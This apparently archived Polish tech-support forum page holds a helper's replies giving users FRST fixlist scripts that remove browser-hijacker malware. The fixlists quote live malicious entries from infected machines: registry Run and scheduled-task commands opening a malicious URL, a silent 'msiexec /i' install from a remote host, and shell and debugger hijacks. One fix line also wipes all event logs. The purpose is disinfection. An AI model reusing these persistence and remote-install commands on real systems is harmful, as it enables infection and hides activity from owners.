Skocz do zawartości
Zamknięcie Forum PC LAB

Szanowny Użytkowniku,

Informujemy, że za 30 dni tj. 30 listopada 2024 r. serwis internetowy Forum PC LAB zostanie zamknięty.

Administrator Serwisu Forum PC LAB - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie: wypowiada całość usług Serwisu Forum PC LAB z zachowaniem miesięcznego okresu wypowiedzenia.

Administrator Serwisu Forum PC LAB informuje, że:

  1. Z dniem 29 listopada 2024 r. zakończy się świadczenie wszystkich usług Serwisu Forum PC LAB. Ważną przyczyną uzasadniającą wypowiedzenie jest zamknięcie Serwisu Forum PC LAB
  2. Dotychczas zamowione przez Użytkownika usługi Serwisu Forum PC LAB będą świadczone w okresie wypowiedzenia tj. do dnia 29 listopada 2024 r.
  3. Po ogłoszeniu zamknięcia Serwisu Forum od dnia 30 października 2024 r. zakładanie nowych kont w serwisie Forum PC LAB nie będzie możliwe
  4. Wraz z zamknięciem Serwisu Forum PC LAB, tj. dnia 29 listopada 2024 r. nie będzie już dostępny katalog treści Forum PC LAB. Do tego czasu Użytkownicy Forum PC LAB mają dostęp do swoich treści w zakładce "Profil", gdzie mają możliwość ich skopiowania lub archiwizowania w formie screenshotów.
  5. Administrator danych osobowych Użytkowników - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie zapewnia realizację praw podmiotów danych osobowych przez cały okres świadczenia usług Serwisu Forum PC LAB. Szczegółowe informacje znajdziesz w Polityce Prywatności

Administrator informuje, iż wraz z zamknięciem Serwisu Forum PC LAB, dane osobowe Użytkowników Serwisu Forum PC LAB zostaną trwale usunięte ze względu na brak podstawy ich dalszego przetwarzania. Proces trwałego usuwania danych z kopii zapasowych może przekroczyć termin zamknięcia Forum PC LAB o kilka miesięcy. Wyjątek może stanowić przetwarzanie danych użytkownika do czasu zakończenia toczących się postepowań.

filutka78

Forumowicze
 Pokaż profil  Zobacz aktywność

  • Liczba zawartości

    18069

  • Rejestracja

  • Ostatnia wizyta

Odpowiedzi dodane przez filutka78

  1. Napisano · Edytowane przez filutka78

    -->>@Tajniiaczek

     

    Podawanie logu w postaci dokumentu Google, to zły pomysł - nie da się kopiować z prawokliku.

     

    Otwórz Notatnik i wklej w nim:

    Task: {4599831E-77DB-4B4B-BA84-1BE35F18DC27} - System32\Tasks\Domek => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Domek /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-2508327241-2422219395-633514987-1001\...\Run: [Domek] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    Task: {85698919-FEFC-4556-8AD3-334AB5BD949D} - \WPD\SqmUpload_S-1-5-21-2508327241-2422219395-633514987-1001 -> Brak pliku <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Domek\Downloads\frst

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  2. Napisano · Edytowane przez filutka78

    -->>@buniek_

     

    Otwórz Notatnik i wklej w nim:

    Task: {AB4A5B5F-DA44-4407-B1CA-ED5A6CD974F6} - System32\Tasks\kozub => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v kozub /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-4229698195-3269153976-841567729-1001\...\Run: [kozub] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\local-settings.js [2016-04-04] <==== UWAGA (Linkuje do pliku *.cfg)

    FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\mozilla.cfg [2016-05-10] <==== UWAGA

    Task: {96A28797-4AEF-4ECB-B62E-094045C3D50F} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA

    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA

    SearchScopes: HKU\S-1-5-21-4229698195-3269153976-841567729-1001 -> DefaultScope {5A75E3EA-66B3-4588-8A4C-6373A3F46D2C} URL =

    SearchScopes: HKU\S-1-5-21-4229698195-3269153976-841567729-1001 -> {5A75E3EA-66B3-4588-8A4C-6373A3F46D2C} URL =

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść na pulpicie

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  3. Napisano · Edytowane przez filutka78

    -->>@lllucek4

     

    Otwórz Notatnik i wklej w nim:

    Task: {60FD13D1-3BDD-493C-BB51-FE92BA4C6066} - System32\Tasks\Lucek => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Lucek /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1943258891-3461022236-861446353-1000\...\Run: [Lucek] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    HKU\S-1-5-21-1943258891-3461022236-861446353-1000\...\Policies\Explorer: []

    HKLM-x32\...\Run: [] => [X]

    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA

    GroupPolicy: Ograniczenia <==== UWAGA

    S3 dbx; system32\DRIVERS\dbx.sys [X]

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Lucek\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  4. Napisano · Edytowane przez filutka78

    ->>@piotrquinta

     

    Otwórz Notatnik i wklej w nim:

    HKU\S-1-5-21-4259068571-2766124970-1038124262-1001\...\Run: [Piotr] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    Task: {64EE38BC-5D36-4995-B09B-47A9C897230D} - System32\Tasks\Piotr => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Piotr /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-4259068571-2766124970-1038124262-1001\...\Winlogon: [shell] C:\Windows\System32\cmd.exe [272896 2017-09-29] (Microsoft Corporation) <==== UWAGA

    HKU\S-1-5-21-4259068571-2766124970-1038124262-1001\...\Command Processor: @mode 15,1 & tasklist /FI "IMAGENAME eq SoundMixer.exe" 2>NUL | find /I /N "SoundMixer.exe">NUL && exit & start /MIN "" "C:\Users\Piotr\AppData\Roaming\Microsoft\SoundMixer\SoundMixer.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze c:\Users\Piotr\AppData\Local\Temp\scoped_dir7156_28274

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  5. Napisano · Edytowane przez filutka78

    ->>@piotrquinta

     

    Logi są zniekształcone - na "wklejto" trzeba wklejać tekst, a nie plik.

     

    Otwórz Notatnik i wklej w nim:

    Task: {64EE38BC-5D36-4995-B09B-47A9C897230D} - System32TasksPiotr => cmd.exe /c REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun /f /v Piotr /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKUS-1-5-21-4259068571-2766124970-1038124262-1001...Run: [Piotr] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w C:UsersPiotrAppDataLocalTempscoped_dir7156_28274

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

    Nie wiem, czy to się wykona, bo "fixlist" sporządziłam na postawie zniekształconych logów.

     

    F.

  6. Napisano · Edytowane przez filutka78

    >>@mati2560

     

    Masz więcej infekcji.

    1) Użyj >Adw-cleaner

    najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk OCZYŚĆ (CLEANING), to kliknij na niego.

    Pokaż raport z niego "C"

     

    2) Otwórz Notatnik i wklej w nim:

    Task: {5BAA64F7-C2F2-4559-8228-D1F2B275EE74} - System32\Tasks\Ja => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ja /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1589180650-2553265974-162543590-1002\...\Run: [Ja] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1388679207&from=wpm0102&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX

    ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1388679207&from=wpm0102&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX

    ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1388679207&from=wpm0102&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX

    ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.delta-homes.com/?type=sc&ts=1388679207&from=wpm0102&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX

    ShortcutWithArgument: C:\Users\Ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> www.google.pl

    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1388679207&from=wpm0102&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX

    Task: C:\Windows\Tasks\0915tbUpdateInfo.job => C:\ProgramData\Avg_Update_0915tb\0915tb_{94CEDF87-E175-41D1-AEBA-66925F69CDFC}.exe

    Task: C:\Windows\Tasks\1015tbUpdateInfo.job => C:\ProgramData\Avg_Update_1015tb\1015tb_{92D37021-B7BE-4378-AF5A-98858F74E5AC}.exe

    HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [1707080 2017-06-26] ()

    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA

    HKU\S-1-5-21-1589180650-2553265974-162543590-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://search.delta-homes.com/web/?utm_source=b&utm_medium=wpm0226&utm_campaign=installer&utm_content=ds&from=wpm0226&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX&ts=1393410177&type=default&q={searchTerms}

    HKU\S-1-5-21-1589180650-2553265974-162543590-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://search.delta-homes.com/web/?utm_source=b&utm_medium=wpm0226&utm_campaign=installer&utm_content=ds&from=wpm0226&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX&ts=1393410177&type=default&q={searchTerms}

    SearchScopes: HKLM -> DefaultScope - brak wartości

    SearchScopes: HKU\S-1-5-21-1589180650-2553265974-162543590-1002 -> DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={1D9AB3E9-339F-4DC7-9F0A-8F4862F4756F}&mid=615387cdd2cf47d3822e81ac0fcbc71d-5b0afdc8c5a1b008b17035cbf5c6554233af0c98&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0415tb&pr=fr&d=2014-01-12 11:12:39&v=19.0.0.10&pid=safeguard&sg=&sap=dsp&q={searchTerms}

    SearchScopes: HKU\S-1-5-21-1589180650-2553265974-162543590-1002 -> {5DC539A7-93B1-44f2-AE78-1A139D1203EB} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=IEBDSV

    SearchScopes: HKU\S-1-5-21-1589180650-2553265974-162543590-1002 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={1D9AB3E9-339F-4DC7-9F0A-8F4862F4756F}&mid=615387cdd2cf47d3822e81ac0fcbc71d-5b0afdc8c5a1b008b17035cbf5c6554233af0c98&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0415tb&pr=fr&d=2014-01-12 11:12:39&v=19.0.0.10&pid=safeguard&sg=&sap=dsp&q={searchTerms}

    BHO: Brak nazwy -> {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -> Brak pliku

    BHO-x32: AVG SafeGuard toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG SafeGuard toolbar\19.7.0.632\AVG SafeGuard toolbar_toolbar.dll [2017-06-26] (AVG Secure Search)

    Toolbar: HKLM - Brak nazwy - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku

    Toolbar: HKLM-x32 - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG SafeGuard toolbar\19.7.0.632\AVG SafeGuard toolbar_toolbar.dll [2017-06-26] (AVG Secure Search)

    StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.dosearches.com/?utm_source=b&utm_medium=cor&utm_campaign=rg&utm_content=sc&from=cor&uid=HitachiXHDS721075KLA330_GTE200P8H8BTGEH8BTGEX&ts=1383996382

    FF SearchPlugin: C:\Users\Ja\AppData\Roaming\Mozilla\Firefox\Profiles\jewip4rh.default\searchplugins\avg-secure-search.xml [2017-06-26]

    FF HKLM-x32\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG SafeGuard toolbar\FireFoxExt\19.0.0.10 => nie znaleziono

    FF Plugin: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelogx64.dll [brak pliku]

    FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll [brak pliku]

    FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\190.7.0\\npsitesafety.dll [brak pliku]

    FF Plugin-x32: @esn/esnlaunch,version=1.118.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.118.0\npesnlaunch.dll [brak pliku]

    FF Plugin-x32: @esn/esnlaunch,version=1.132.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.132.0\npesnlaunch.dll [brak pliku]

    FF Plugin-x32: @esn/esnlaunch,version=1.140.0 -> C:\Program Files (x86)\Battlelog Web Plugins\1.140.0\npesnlaunch.dll [brak pliku]

    FF Plugin-x32: @esn/esnlaunch,version=2.1.4 -> C:\Program Files (x86)\Battlelog Web Plugins\2.1.4\npesnlaunch.dll [brak pliku]

    FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll [brak pliku]

    FF Plugin-x32: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelog.dll [brak pliku]

    FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll [brak pliku]

    FF Plugin HKU\S-1-5-21-1589180650-2553265974-162543590-1002: @my.com/Games -> C:\Users\Ja\AppData\Local\MyComGames\NPMyComDetector.dll [brak pliku]

    S3 TBPanel; Brak ImagePath

    S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]

    S3 gdrv; \??\C:\Windows\gdrv.sys [X]

    C:\Program Files (x86)\Mozilla Firefoxsafeguard-secure-search.xml

    Task: {1588537F-2A48-4AEE-BB0D-5180FEC5F9A6} - System32\Tasks\{A18A2607-8A38-4E9C-B9B2-42FF070A90BB} => C:\Windows\system32\pcalua.exe -a "D:\steam\steamapps\common\Left 4 Dead 2\bin\addoninstaller.exe" -d "D:\steam\steamapps\common\Left 4 Dead 2" -c /register

    Task: {560D263D-469F-46DC-A101-FC56CD5BCCCD} - System32\Tasks\{5AE53F07-4943-4392-9494-99A0CC6DB58D} => C:\Windows\system32\pcalua.exe -a G:\AUTOSTARTER.EXE -d G:\

    Task: {64C3DA8B-DAED-425B-9E21-8A177791B4E2} - System32\Tasks\{B9152DA5-F6E4-434E-8A51-845E1F411E5F} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Steam\steam.exe" -c steam://uninstall/217750

    Task: {DFC2A338-77AF-4618-8271-946B4BF054BA} - System32\Tasks\1015tbUpdateInfo => C:\ProgramData\Avg_Update_1015tb\1015tb_{92D37021-B7BE-4378-AF5A-98858F74E5AC}.exe

    Task: {FE95C506-1601-47D0-83C9-2ADECF38CB7A} - System32\Tasks\{46BB992F-5A8B-45D8-9FCF-2D559801BCC2} => C:\Windows\system32\pcalua.exe -a "D:\GRY\Diablo II + Diablo II - Lord of Destruction PL\Uninstall.exe"

    Task: {9A777961-AD65-49AD-B193-0AFB5DBE501F} - System32\Tasks\MdmUpdateTaskMachineCore => "C:\Users\Ja\AppData\Roaming\WinRAR\Caches\mdm" [Argument = rubadub.] <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Ja\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    3) Zainstaluj nowszą, bezpieczniejszą wersję Javy, wg https://www.fixitpc.pl/topic/5-dezynfekcja-kroki-finalizuj%C4%85ce-temat/#entry179769

     

    4) Zrób nowe logi FRST.

     

    5) Napisz, czy problem znikł?

     

    F.

  7. Napisano · Edytowane przez filutka78

    >>@jaroslawpiotr

     

    Otwórz Notatnik i wklej w nim:

    Task: {B9A8AD57-1A49-42B9-98E7-AED49799AE2D} - System32\Tasks\user => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v user /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1117522032-557624514-3531985870-1000\...\Run: [user] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Brak pliku

    ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku

    ontextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku

    ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku

    ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku

    ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku

    ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> Brak pliku

    Task: {33C0019C-0194-401C-81A7-E6D9ADDEB597} - System32\Tasks\{B49F83EC-0A78-4A25-955D-68E258798042} => C:\Windows\system32\pcalua.exe -a "D:\PIT 2016\Backup\Vg\VirtuaGirl2.exe" -d "D:\PIT 2016\Backup\Vg"

    Task: {35DF1B3F-3221-443B-AA7A-F5FA5B3F34C5} - System32\Tasks\{E8143C29-1D9A-4AA3-AE57-9782089B1D78} => C:\Windows\system32\pcalua.exe -a "D:\TAPETY\tapety\E2008-TS\E2008-TT\E2008-TT\Erosgames 2008 - The Teacher\ErosAdv07Full.exe" -d "D:\TAPETY\tapety\E2008-TS\E2008-TT\E2008-TT\Erosgames 2008 - The Teacher"

    Task: {B8F0042A-B78E-40AB-8A7B-011A0C0C7BE9} - System32\Tasks\{F31BE83F-7729-4F9E-AD1A-14B03804D4D7} => C:\Windows\system32\pcalua.exe -a D:\POBIERALNIA\justcause21113trainer\brew-jcu1.exe -d D:\POBIERALNIA\justcause21113trainer

    Task: {C9FDA9D4-F0B7-447D-8B7B-90B5F942AE9C} - System32\Tasks\{51087200-6842-41CF-A7DC-07D5D71F31A1} => C:\Windows\system32\pcalua.exe -a "D:\pes roboczy\DODATKI\PESEdit.com_2013_Patch_1.1\PESEdit.com_2013_Patch_1.1\Installer.exe" -d "D:\pes roboczy\DODATKI\PESEdit.com_2013_Patch_1.1\PESEdit.com_2013_Patch_1.1"

    Task: {D54BE925-C6C0-43BB-A2A9-0230CEEA27BD} - System32\Tasks\{B494BF24-DE07-4ECA-9185-F7140C473FA8} => C:\Windows\system32\pcalua.exe -a "D:\POBIERALNIA\Installer 6.0.exe" -d D:\POBIERALNIA

    Task: {FC288637-E064-4277-9F88-3BF35A0DD599} - System32\Tasks\{F7A9A179-5E1D-4885-8D9E-9FF3DCA9F440} => C:\Windows\system32\pcalua.exe -a F:\Installer.exe -d F:\

    HKU\S-1-5-21-1117522032-557624514-3531985870-1000\...\Run: [GalaxyClient] => [X]

    FF Plugin HKU\S-1-5-21-1117522032-557624514-3531985870-1000: ubisoft.com/uplaypc -> D:\HAWX2\orbit\npuplaypc.dll [brak pliku]

    S3 MSICDSetup; \??\E:\CDriver64.sys [X]

    S3 NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys [X]

    S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze D:\POBIERALNIA

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  8. Napisano · Edytowane przez filutka78

    Dodatkowo zauważyłem taką stronę w przeglądarce, nie wiem co to i nie wiem jak to usunąć,

    To jest właśnie ta strona startowa (główna), którą zaleciłam Ci zmienić w Chrome.

    Wykonaj tamto moje zalecenie, bo FRST tego nie usunie, trzeba to robić ręcznie.

     

    W nowym logu, oprócz tej złej strony w Chrome, nie ma nic więcej podejrzanego.

     

    F.

  9. Napisano

    >>@corradoskj

     

    U Ciebie jest też druga, inna infekcja.

     

    1) Otwórz Notatnik i wklej w nim:

    Task: {DBE21469-26E0-4A29-9D4F-A17255C82CDC} - System32\Tasks\CorradoSKJ => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v CorradoSKJ /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-3324862985-470890415-3921799371-1001\...\Run: [CorradoSKJ] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    HKU\S-1-5-21-3324862985-470890415-3921799371-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj8dNYQWRjQYFTlWMjM3RWM4FjE1OTH1NdwyOYVYFTHdRH== /q <==== UWAGA

    HKU\S-1-5-21-3324862985-470890415-3921799371-1001\...\Policies\Explorer: []

    IFEO\DisplaySwitch.exe: [Debugger]

    IFEO\taskmgr.exe: [Debugger]

    GroupPolicy: Ograniczenia <==== UWAGA

    CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3vZOxc6r0vkIwdHMlBLMBU0A7BBukLMS9L9p5ZDSps0gQ3JHJ1IP-R0bFMfTMbjdA7d2aBmzo5WcXhFbQgTygfP1dcJxPHhgOnBcoxAdTl4v_HM3a0hVI8IB92hL_k3HEOs6xpd6KkDB9LpkQphUPd758nZV

    HKU\S-1-5-21-3324862985-470890415-3921799371-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe <==== UWAGA

    RemoveDirectory: C:\Program Files (x86)\Bookness

    Task: {E13E3287-79C8-4BF5-81E1-403B94AA729B} - System32\Tasks\{C508E618-B663-4A62-9A2D-FF930FF5177E} => C:\WINDOWS\system32\pcalua.exe -a C:\Users\CorradoSKJ\Desktop\DXTweak2.exe -d C:\Users\CorradoSKJ\Desktop

    Task: {8E45ABC4-ADFE-4609-9099-DFA530D028FA} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA

    Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}

    HOSTS:

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść s folderze C:\Users\CorradoSKJ\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    2) Uruchom Google Chrome

    > Naciśnij klawisze: lewy Alt+F i kliknij przycisk Ustawienia >

    > Sekcja: Po uruchomieniu > wybierz: Otwórz konkretną stronę lub zestaw stron >

    > Kliknij: Wybierz strony >

    > wpisz nowy adres strony głównej i kliknij przycisk OK.

     

    3) Zrób nowe logi FRST.

     

    F.

  10. Napisano · Edytowane przez filutka78

    >>@mycha23

     

    Otwórz Notatnik i wklej w nim:

    Task: {5F5C50BB-779E-4832-87E8-05094EEACAE2} - System32\Tasks\kotito => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v kotito /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-2346337728-1796015880-1897310980-1001\...\Run: [kotito] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    Task: {74C7D2FC-8549-4FB0-9C41-05E7295790C9} - System32\Tasks\{7A9E1D0C-483B-42FD-AC28-2F58CC086CA8} => C:\Windows\system32\pcalua.exe -a E:\uruchom.exe -d E:\

    Task: {CB03C983-BE2C-4C80-B9A9-ADC0B26FA876} - System32\Tasks\{7CD4EA14-D7E4-4C70-BDA0-DDAB9C2B014F} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Elaborate Bytes\CloneDVD2\CloneDVD2.exe" -d "C:\Program Files (x86)\Elaborate Bytes\CloneDVD2"

    HKLM-x32\...\Run: [] => [X]

    CHR NewTab: Default -> Not-active:"chrome-extension://llaficoajjainaijghjlofdfmbjpebpa/newtab.html"

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\kotito\Desktop

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  11. Napisano · Edytowane przez filutka78

    >>@jakubs095

     

    Otwórz Notatnik i wklej w nim:

    Task: {8B2D78E5-8A94-4F39-B326-626098B551AC} - System32\Tasks\Kuba => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Kuba /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-4266875353-442399590-3786895593-1001\...\Run: [Kuba] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    Task: {F19184A9-C59D-4602-9A5F-9E635CA03DDE} - System32\Tasks\{479D326D-2337-4CB3-BA73-9537966BFBFD} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{840C6D9A-DAFB-4800-B688-BB2601AA2E7C}\setup.exe" -c -runfromtemp -l0x0409 -removeonly

    BHO-x32: Brak nazwy -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> Brak pliku

    S3 MSICDSetup; \??\E:\CDriver64.sys [X]

    S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20170722.001\NAVENG.SYS [X]

    S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.7.0.76\Definitions\SDSDefs\20170722.001\NAVEX15.SYS [X]

    S3 NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys [X]

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Kuba\Desktop\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

